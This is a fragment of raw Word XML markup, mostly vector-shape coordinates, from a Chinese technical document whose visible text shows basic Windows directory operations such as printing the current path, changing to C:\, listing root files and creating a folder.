0,2215,11481,2215,11482,2215,11484,2215,11485,2215,11486,2215,11488,2215,11489,2215,11491,2215,11492,2215,11494,2215,11496,2215,11498,2215,11499,2215,11501,2215,11503,2215,11505,2215,11507,2215,11510,2215,11512,2215,11514,2215,11516,2215,11519,2215,11521,2215,11524,2215,11526,2215,11529,2215,11532,2215,11534,2215,11537,2215,11540,2215,11543,2215,11546,2215,11550,2215,11553,2215,11556,2215,11559,2215,11563,2215,11567,2215,11570,2215,11574,2215,11578,2215,11582,2215,11586,2215,11590,2215,11594,2215,11598,2215,11602,2215,11607,2215,11611,2215,11616,2215,11620,2215,11625,2215,11630,2215,11635,2215,11640,2215,11645,2215,11650,2215,11656,2215,11661,2215,11667,2215,11672,2215,11678,2215,11684,2215,11690,2215,11696,2215,11702,2215,11709,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2213,11715,2213,11715,2213,11715,2213,11715,2213,11715,2212,11715,2212,11715,2212,11715,2212,11715,2211,11715,2211,11715,2211,11715,2210,11715,2210,11715,2209,11715,2209,11715,2209,11715,2208,11715,2208,11715,2207,11715,2207,11715,2206,11715,2206,11715,2205,11715,2205,11715,2204,11715,2203,11715,2203,11715,2202,11715,2201,11715,2200,11715,2200,11715,2199,11715,2198,11715,2197,11715,2196,11715,2196,11715,2195,11715,2194,11715,2193,11715,2192,11715,2191,11715,2190,11715,2189,11715,2187,11715,2186,11715,2185,11715,2184,11715,2183,11715,2181,11715,2180,11715,2179,11715,2177,11715,2176,11715,2174,11715,2173,11715,2171,11715,2170,11715,2168,11715,2167,11715,2165,11715,2163,11715,2161,11715,2160,11715,2158,11715,2156,11715,2154,11715,2152,11715,2150,11715,2148,11715,2146,11715,2144,11715,2142,11715,2140,11715,2137,11715,2135,11715,2133,11715,2130,11715,2128,11715,2125,11715,2123,11715,2120,11715,2118,11715,2115,11715,2112,11715,2110,11715,2107,11715,2104,11715,2101,11715,2098,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11713,2095,11713,2095,11713,2095,11713,2095,11712,2095,11712,2095,11712,2095,11711,2095,11711,2095,11710,2095,11710,2095,11709,2095,11709,2095,11708,2095,11708,2095,11707,2095,11707,2095,11706,2095,11705,2095,11704,2095,11704,2095,11703,2095,11702,2095,11701,2095,11700,2095,11699,2095,11698,2095,11697,2095,11696,2095,11695,2095,11694,2095,11692,2095,11691,2095,11690,2095,11688,2095,11687,2095,11685,2095,11684,2095,11682,2095,11681,2095,11679,2095,11677,2095,11675,2095,11673,2095,11671,2095,11669,2095,11667,2095,11665,2095,11663,2095,11661,2095,11658,2095,11656,2095,11654,2095,11651,2095,11648,2095,11646,2095,11643,2095,11640,2095,11637,2095,11634,2095,11631,2095,11628,2095,11625,2095,11622,2095,11619,2095,11615,2095,11612,2095,11608,2095,11605,2095,11601,2095,11597,2095,11593,2095,11589,2095,11585,2095,11581,2095,11577,2095,11572,2095,11568,2095,11564,2095,11559,2095,11554,2095,11549,2095,11545,2095,11540,2095,11535,2095,11529,2095,11524,2095,11519,2095,11513,2095,11508,2095,11502,2095,11496,2095,11491,2095,11485,2095,11479,2095,11472,2095,11466,2095,11460e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:626.400pt;width:368.399pt;height:109.8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快</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>速获取当前绝对路径：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fs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pwd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"C:\\Documents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Settings\\Administrator\\\xE6\xA1\x8C\xE9\x9D\xA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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2"</w:t>
      </w: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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>录相关操作：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chdir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"c:\\"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4"/>
        </w:rPr>
        <w:t> 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80053"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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entries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"ADFS"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"AUTOEXEC.BAT"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"boot.ini"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"bootfont.bin"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"CONFIG.SYS"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"Documents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Settings"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"Inetpub"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"IO.SYS"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"MSDOS.SYS"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"NTDETECT.CO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M"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"ntldr"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"pagefile.sys"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"Program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Files"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"Program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Files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(x86)"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"REC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YCLER"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"System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Volume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Information"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"WINDOWS"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"wmpub"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74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建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>立文件夹：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mkdir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"Micropoor"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353" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="13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80053"/>
          <w:spacing w:val="17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hash操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作：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49.500pt;width:0.500pt;height:399.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,990" coordsize="10,7990">
        <v:shape style="position:absolute;left:10390;top:990;width:10;height:7990" coordorigin="10390,990" coordsize="10,7990" path="m10402,1000l10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1001,10402,1001,10402,1002,10402,1003,10402,1004,10402,1006,10402,1008,10402,1010,10402,1013,10402,1015,10402,1019,10402,1023,10402,1027,10402,1032,10402,1037,10402,1043,10402,1050,10402,1057,10402,1065,10402,1074,10402,1083,10402,1093,10402,1104,10402,1115,10402,1127,10402,1141,10402,1155,10402,1170,10402,1186,10402,1203,10402,1221,10402,1239,10402,1259,10402,1281,10402,1303,10402,1326,10402,1351,10402,1376,10402,1403,10402,1431,10402,1461,10402,1491,10402,1523,10402,1557,10402,1592,10402,1628,10402,1666,10402,1705,10402,1746,10402,1788,10402,1832,10402,1877,10402,1924,10402,1973,10402,2023,10402,2075,10402,2129,10402,2184,10402,2242,10402,2301,10402,2362,10402,2424,10402,2489,10402,2556,10402,2625,10402,2695,10402,2768,10402,2843,10402,2919,10402,2998,10402,3079,10402,3162,10402,3248,10402,3335,10402,3425,10402,3517,10402,3612,10402,3709,10402,3808,10402,3909,10402,4013,10402,4119,10402,4228,10402,4340,10402,4453,10402,4570,10402,4689,10402,4810,10402,4935,10402,5062,10402,5191,10402,5324,10402,5459,10402,5597,10402,5737,10402,5881,10402,6027,10402,6177,10402,6329,10402,6484,10402,6642,10402,6804,10402,6968,10402,7135,10402,7306,10402,7479,10402,7656,10402,7836,10402,8019,10402,8205,10402,8395,10402,8588,10402,8784,10402,8984e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:390" coordorigin="1490,99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4,10484,1004,10484,1005,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1045,10484,1047,10484,1050,10484,1052,10484,1055,10484,1057,10484,1060,10484,1063,10484,1066,10484,1069,10484,1072,10484,1076,10484,1079,10484,1082,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1114,10484,1118,10484,1123,10484,1127,10484,1132,10484,1137,10484,1142,10484,1147,10484,1152,10484,1157,10484,1163,10484,1168,10484,1174,10484,1180,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1224,10484,1231,10484,1238,10484,1245,10484,1253,10484,1260,10484,1268,10484,1275,10484,1283,10484,1291,10484,1299,10484,1308,10484,1316,10484,1325,10484,1334,10484,1343,10484,1352,10484,1361,10484,1370,10484,1380,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10483,1390,10482,1390,10482,1390,10480,1390,10479,1390,10477,1390,10475,1390,10473,1390,10470,1390,10466,1390,10462,1390,10458,1390,10453,1390,10448,1390,10442,1390,10435,1390,10428,1390,10419,1390,10411,1390,10401,1390,10391,1390,10379,1390,10367,1390,10354,1390,10340,1390,10326,1390,10310,1390,10293,1390,10275,1390,10256,1390,10236,1390,10215,1390,10192,1390,10168,1390,10143,1390,10117,1390,10090,1390,10061,1390,10031,1390,9999,1390,9966,1390,9931,1390,9895,1390,9858,1390,9819,1390,9778,1390,9735,1390,9691,1390,9646,1390,9598,1390,9549,1390,9498,1390,9445,1390,9391,1390,9334,1390,9275,1390,9215,1390,9153,1390,9088,1390,9022,1390,8953,1390,8883,1390,8810,1390,8735,1390,8658,1390,8578,1390,8497,1390,8413,1390,8326,1390,8238,1390,8146,1390,8053,1390,7957,1390,7859,1390,7758,1390,7654,1390,7548,1390,7439,1390,7328,1390,7214,1390,7097,1390,6977,1390,6855,1390,6730,1390,6602,1390,6471,1390,6337,1390,6201,1390,6061,1390,5918,1390,5773,1390,5624,1390,5472,1390,5317,1390,5159,1390,4997,1390,4833,1390,4665,1390,4494,1390,4319,1390,4141,1390,3960,1390,3776,1390,3587,1390,3396,1390,3201,1390,3002,1390,2800,1390,2594,1390,2385,1390,2172,1390,1955,1390,1734,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1388,1510,1388,1510,1388,1510,1388,1510,1387,1510,1387,1510,1386,1510,1386,1510,1386,1510,1385,1510,1385,1510,1384,1510,1383,1510,1383,1510,1382,1510,1381,1510,1381,1510,1380,1510,1379,1510,1378,1510,1377,1510,1376,1510,1375,1510,1374,1510,1373,1510,1371,1510,1370,1510,1369,1510,1367,1510,1366,1510,1364,1510,1362,1510,1361,1510,1359,1510,1357,1510,1355,1510,1353,1510,1351,1510,1349,1510,1347,1510,1345,1510,1342,1510,1340,1510,1337,1510,1335,1510,1332,1510,1329,1510,1326,1510,1323,1510,1320,1510,1317,1510,1314,1510,1310,1510,1307,1510,1303,1510,1300,1510,1296,1510,1292,1510,1288,1510,1284,1510,1280,1510,1276,1510,1271,1510,1267,1510,1262,1510,1257,1510,1252,1510,1247,1510,1242,1510,1237,1510,1232,1510,1226,1510,1221,1510,1215,1510,1209,1510,1203,1510,1197,1510,1191,1510,1185,1510,1178,1510,1172,1510,1165,1510,1158,1510,1151,1510,1144,1510,1137,1510,1129,1510,1122,1510,1114,1510,1106,1510,1098,1510,1090,1510,1082,1510,1073,1510,1064,1510,1056,1510,1047,1510,1038,1510,1028,1510,1019,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1370;width:8990;height:370" coordorigin="1490,1370" coordsize="8990,370" path="m1510,1390l1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1511,1390,1512,1390,1512,1390,1514,1390,1515,1390,1517,1390,1519,1390,1521,1390,1524,1390,1528,1390,1532,1390,1536,1390,1541,1390,1546,1390,1552,1390,1559,1390,1566,1390,1575,1390,1583,1390,1593,1390,1603,1390,1615,1390,1627,1390,1640,1390,1654,1390,1668,1390,1684,1390,1701,1390,1719,1390,1738,1390,1758,1390,1780,1390,1802,1390,1826,1390,1851,1390,1877,1390,1904,1390,1933,1390,1963,1390,1995,1390,2028,1390,2063,1390,2099,1390,2136,1390,2175,1390,2216,1390,2259,1390,2303,1390,2348,1390,2396,1390,2445,1390,2496,1390,2549,1390,2604,1390,2660,1390,2719,1390,2779,1390,2841,1390,2906,1390,2972,1390,3041,1390,3112,1390,3184,1390,3259,1390,3336,1390,3416,1390,3498,1390,3582,1390,3668,1390,3757,1390,3848,1390,3941,1390,4037,1390,4136,1390,4236,1390,4340,1390,4446,1390,4555,1390,4666,1390,4780,1390,4897,1390,5017,1390,5139,1390,5264,1390,5392,1390,5523,1390,5657,1390,5793,1390,5933,1390,6076,1390,6222,1390,6370,1390,6522,1390,6677,1390,6835,1390,6997,1390,7161,1390,7329,1390,7500,1390,7675,1390,7853,1390,8034,1390,8219,1390,8407,1390,8598,1390,8793,1390,8992,1390,9194,1390,9400,1390,9609,1390,9823,1390,10039,1390,10260,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1391,10484,1391,10484,1391,10484,1391,10484,1391,10484,1392,10484,1392,10484,1392,10484,1393,10484,1393,10484,1393,10484,1394,10484,1394,10484,1395,10484,1395,10484,1396,10484,1397,10484,1397,10484,1398,10484,1399,10484,1400,10484,1401,10484,1401,10484,1402,10484,1403,10484,1404,10484,1406,10484,1407,10484,1408,10484,1409,10484,1411,10484,1412,10484,1413,10484,1415,10484,1416,10484,1418,10484,1420,10484,1422,10484,1423,10484,1425,10484,1427,10484,1429,10484,1431,10484,1434,10484,1436,10484,1438,10484,1441,10484,1443,10484,1446,10484,1448,10484,1451,10484,1454,10484,1457,10484,1460,10484,1463,10484,1466,10484,1469,10484,1473,10484,1476,10484,1480,10484,1484,10484,1487,10484,1491,10484,1495,10484,1499,10484,1503,10484,1508,10484,1512,10484,1516,10484,1521,10484,1526,10484,1530,10484,1535,10484,1540,10484,1546,10484,1551,10484,1556,10484,1562,10484,1567,10484,1573,10484,1579,10484,1585,10484,1591,10484,1597,10484,1603,10484,1610,10484,1617,10484,1623,10484,1630,10484,1637,10484,1644,10484,1652,10484,1659,10484,1666,10484,1674,10484,1682,10484,1690,10484,1698,10484,1706,10484,1715,10484,1723,10484,1732,10484,1741,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10483,1750,10482,1750,10482,1750,10480,1750,10479,1750,10477,1750,10475,1750,10473,1750,10470,1750,10466,1750,10462,1750,10458,1750,10453,1750,10448,1750,10442,1750,10435,1750,10428,1750,10419,1750,10411,1750,10401,1750,10391,1750,10379,1750,10367,1750,10354,1750,10340,1750,10326,1750,10310,1750,10293,1750,10275,1750,10256,1750,10236,1750,10215,1750,10192,1750,10168,1750,10143,1750,10117,1750,10090,1750,10061,1750,10031,1750,9999,1750,9966,1750,9931,1750,9895,1750,9858,1750,9819,1750,9778,1750,9735,1750,9691,1750,9646,1750,9598,1750,9549,1750,9498,1750,9445,1750,9391,1750,9334,1750,9275,1750,9215,1750,9153,1750,9088,1750,9022,1750,8953,1750,8883,1750,8810,1750,8735,1750,8658,1750,8578,1750,8497,1750,8413,1750,8326,1750,8238,1750,8146,1750,8053,1750,7957,1750,7859,1750,7758,1750,7654,1750,7548,1750,7439,1750,7328,1750,7214,1750,7097,1750,6977,1750,6855,1750,6730,1750,6602,1750,6471,1750,6337,1750,6201,1750,6061,1750,5918,1750,5773,1750,5624,1750,5472,1750,5317,1750,5159,1750,4997,1750,4833,1750,4665,1750,4494,1750,4319,1750,4141,1750,3960,1750,3776,1750,3587,1750,3396,1750,3201,1750,3002,1750,2800,1750,2594,1750,2385,1750,2172,1750,1955,1750,1734,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1748,1510,1748,1510,1748,1510,1748,1510,1747,1510,1747,1510,1747,1510,1746,1510,1746,1510,1745,1510,1745,1510,1744,1510,1744,1510,1743,1510,1742,1510,1741,1510,1741,1510,1740,1510,1739,1510,1738,1510,1737,1510,1736,1510,1735,1510,1734,1510,1733,1510,1732,1510,1730,1510,1729,1510,1728,1510,1726,1510,1725,1510,1723,1510,1722,1510,1720,1510,1718,1510,1716,1510,1714,1510,1712,1510,1710,1510,1708,1510,1706,1510,1704,1510,1701,1510,1699,1510,1696,1510,1694,1510,1691,1510,1688,1510,1686,1510,1683,1510,1680,1510,1677,1510,1673,1510,1670,1510,1667,1510,1663,1510,1660,1510,1656,1510,1652,1510,1648,1510,1645,1510,1640,1510,1636,1510,1632,1510,1628,1510,1623,1510,1619,1510,1614,1510,1609,1510,1604,1510,1599,1510,1594,1510,1589,1510,1583,1510,1578,1510,1572,1510,1567,1510,1561,1510,1555,1510,1549,1510,1542,1510,1536,1510,1530,1510,1523,1510,1516,1510,1509,1510,1502,1510,1495,1510,1488,1510,1481,1510,1473,1510,1465,1510,1458,1510,1450,1510,1441,1510,1433,1510,1425,1510,1416,1510,1408,1510,1399,1510,1390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90l1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1391,1517,1391,1517,1391,1517,1391,1517,1391,1517,1392,1517,1392,1517,1392,1517,1393,1517,1393,1517,1393,1517,1394,1517,1394,1517,1395,1517,1395,1517,1396,1517,1397,1517,1397,1517,1398,1517,1399,1517,1400,1517,1401,1517,1401,1517,1402,1517,1403,1517,1404,1517,1406,1517,1407,1517,1408,1517,1409,1517,1411,1517,1412,1517,1413,1517,1415,1517,1416,1517,1418,1517,1420,1517,1422,1517,1423,1517,1425,1517,1427,1517,1429,1517,1431,1517,1434,1517,1436,1517,1438,1517,1441,1517,1443,1517,1446,1517,1448,1517,1451,1517,1454,1517,1457,1517,1460,1517,1463,1517,1466,1517,1469,1517,1473,1517,1476,1517,1480,1517,1484,1517,1487,1517,1491,1517,1495,1517,1499,1517,1503,1517,1508,1517,1512,1517,1516,1517,1521,1517,1526,1517,1530,1517,1535,1517,1540,1517,1546,1517,1551,1517,1556,1517,1562,1517,1567,1517,1573,1517,1579,1517,1585,1517,1591,1517,1597,1517,1603,1517,1610,1517,1617,1517,1623,1517,1630,1517,1637,1517,1644,1517,1652,1517,1659,1517,1666,1517,1674,1517,1682,1517,1690,1517,1698,1517,1706,1517,1715,1517,1723,1517,1732,1517,1741,1517,1750e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1730;width:8990;height:390" coordorigin="1490,1730" coordsize="8990,390" path="m1510,1750l1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1511,1750,1512,1750,1512,1750,1514,1750,1515,1750,1517,1750,1519,1750,1521,1750,1524,1750,1528,1750,1532,1750,1536,1750,1541,1750,1546,1750,1552,1750,1559,1750,1566,1750,1575,1750,1583,1750,1593,1750,1603,1750,1615,1750,1627,1750,1640,1750,1654,1750,1668,1750,1684,1750,1701,1750,1719,1750,1738,1750,1758,1750,1780,1750,1802,1750,1826,1750,1851,1750,1877,1750,1904,1750,1933,1750,1963,1750,1995,1750,2028,1750,2063,1750,2099,1750,2136,1750,2175,1750,2216,1750,2259,1750,2303,1750,2348,1750,2396,1750,2445,1750,2496,1750,2549,1750,2604,1750,2660,1750,2719,1750,2779,1750,2841,1750,2906,1750,2972,1750,3041,1750,3112,1750,3184,1750,3259,1750,3336,1750,3416,1750,3498,1750,3582,1750,3668,1750,3757,1750,3848,1750,3941,1750,4037,1750,4136,1750,4236,1750,4340,1750,4446,1750,4555,1750,4666,1750,4780,1750,4897,1750,5017,1750,5139,1750,5264,1750,5392,1750,5523,1750,5657,1750,5793,1750,5933,1750,6076,1750,6222,1750,6370,1750,6522,1750,6677,1750,6835,1750,6997,1750,7161,1750,7329,1750,7500,1750,7675,1750,7853,1750,8034,1750,8219,1750,8407,1750,8598,1750,8793,1750,8992,1750,9194,1750,9400,1750,9609,1750,9823,1750,10039,1750,10260,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1751,10484,1751,10484,1751,10484,1751,10484,1751,10484,1752,10484,1752,10484,1752,10484,1753,10484,1753,10484,1753,10484,1754,10484,1754,10484,1755,10484,1755,10484,1756,10484,1757,10484,1757,10484,1758,10484,1759,10484,1759,10484,1760,10484,1761,10484,1762,10484,1763,10484,1764,10484,1765,10484,1766,10484,1768,10484,1769,10484,1770,10484,1772,10484,1773,10484,1775,10484,1776,10484,1778,10484,1779,10484,1781,10484,1783,10484,1785,10484,1787,10484,1789,10484,1791,10484,1793,10484,1796,10484,1798,10484,1800,10484,1803,10484,1806,10484,1808,10484,1811,10484,1814,10484,1817,10484,1820,10484,1823,10484,1826,10484,1830,10484,1833,10484,1836,10484,1840,10484,1844,10484,1848,10484,1852,10484,1856,10484,1860,10484,1864,10484,1868,10484,1873,10484,1877,10484,1882,10484,1887,10484,1891,10484,1896,10484,1902,10484,1907,10484,1912,10484,1918,10484,1923,10484,1929,10484,1935,10484,1941,10484,1947,10484,1953,10484,1959,10484,1966,10484,1973,10484,1979,10484,1986,10484,1993,10484,2000,10484,2008,10484,2015,10484,2023,10484,2030,10484,2038,10484,2046,10484,2054,10484,2063,10484,2071,10484,2080,10484,2088,10484,2097,10484,2106,10484,2116,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10483,2125,10482,2125,10482,2125,10480,2125,10479,2125,10477,2125,10475,2125,10473,2125,10470,2125,10466,2125,10462,2125,10458,2125,10453,2125,10448,2125,10442,2125,10435,2125,10428,2125,10419,2125,10411,2125,10401,2125,10391,2125,10379,2125,10367,2125,10354,2125,10340,2125,10326,2125,10310,2125,10293,2125,10275,2125,10256,2125,10236,2125,10215,2125,10192,2125,10168,2125,10143,2125,10117,2125,10090,2125,10061,2125,10031,2125,9999,2125,9966,2125,9931,2125,9895,2125,9858,2125,9819,2125,9778,2125,9735,2125,9691,2125,9646,2125,9598,2125,9549,2125,9498,2125,9445,2125,9391,2125,9334,2125,9275,2125,9215,2125,9153,2125,9088,2125,9022,2125,8953,2125,8883,2125,8810,2125,8735,2125,8658,2125,8578,2125,8497,2125,8413,2125,8326,2125,8238,2125,8146,2125,8053,2125,7957,2125,7859,2125,7758,2125,7654,2125,7548,2125,7439,2125,7328,2125,7214,2125,7097,2125,6977,2125,6855,2125,6730,2125,6602,2125,6471,2125,6337,2125,6201,2125,6061,2125,5918,2125,5773,2125,5624,2125,5472,2125,5317,2125,5159,2125,4997,2125,4833,2125,4665,2125,4494,2125,4319,2125,4141,2125,3960,2125,3776,2125,3587,2125,3396,2125,3201,2125,3002,2125,2800,2125,2594,2125,2385,2125,2172,2125,1955,2125,1734,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2124,1510,2124,1510,2124,1510,2124,1510,2124,1510,2124,1510,2123,1510,2123,1510,2123,1510,2122,1510,2122,1510,2122,1510,2121,1510,2121,1510,2120,1510,2120,1510,2119,1510,2118,1510,2118,1510,2117,1510,2116,1510,2116,1510,2115,1510,2114,1510,2113,1510,2112,1510,2111,1510,2110,1510,2109,1510,2107,1510,2106,1510,2105,1510,2103,1510,2102,1510,2100,1510,2099,1510,2097,1510,2096,1510,2094,1510,2092,1510,2090,1510,2088,1510,2086,1510,2084,1510,2082,1510,2079,1510,2077,1510,2075,1510,2072,1510,2069,1510,2067,1510,2064,1510,2061,1510,2058,1510,2055,1510,2052,1510,2049,1510,2045,1510,2042,1510,2038,1510,2035,1510,2031,1510,2027,1510,2023,1510,2019,1510,2015,1510,2011,1510,2007,1510,2002,1510,1998,1510,1993,1510,1988,1510,1983,1510,1978,1510,1973,1510,1968,1510,1963,1510,1957,1510,1952,1510,1946,1510,1940,1510,1934,1510,1928,1510,1922,1510,1916,1510,1909,1510,1902,1510,1896,1510,1889,1510,1882,1510,1875,1510,1867,1510,1860,1510,1852,1510,1845,1510,1837,1510,1829,1510,1821,1510,1812,1510,1804,1510,1795,1510,1786,1510,1778,1510,1768,1510,1759,1510,1750e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1730;width:30;height:390" coordorigin="1490,1730" coordsize="30,390" path="m1517,1750l1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1750,1517,1751,1517,1751,1517,1751,1517,1751,1517,1751,1517,1752,1517,1752,1517,1752,1517,1753,1517,1753,1517,1753,1517,1754,1517,1754,1517,1755,1517,1755,1517,1756,1517,1757,1517,1757,1517,1758,1517,1759,1517,1759,1517,1760,1517,1761,1517,1762,1517,1763,1517,1764,1517,1765,1517,1766,1517,1768,1517,1769,1517,1770,1517,1772,1517,1773,1517,1775,1517,1776,1517,1778,1517,1779,1517,1781,1517,1783,1517,1785,1517,1787,1517,1789,1517,1791,1517,1793,1517,1796,1517,1798,1517,1800,1517,1803,1517,1806,1517,1808,1517,1811,1517,1814,1517,1817,1517,1820,1517,1823,1517,1826,1517,1830,1517,1833,1517,1836,1517,1840,1517,1844,1517,1848,1517,1852,1517,1856,1517,1860,1517,1864,1517,1868,1517,1873,1517,1877,1517,1882,1517,1887,1517,1891,1517,1896,1517,1902,1517,1907,1517,1912,1517,1918,1517,1923,1517,1929,1517,1935,1517,1941,1517,1947,1517,1953,1517,1959,1517,1966,1517,1973,1517,1979,1517,1986,1517,1993,1517,2000,1517,2008,1517,2015,1517,2023,1517,2030,1517,2038,1517,2046,1517,2054,1517,2063,1517,2071,1517,2080,1517,2088,1517,2097,1517,2106,1517,2116,1517,2125e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:105.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2110" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:2110;width:8990;height:910" coordorigin="1490,2110" coordsize="8990,910" 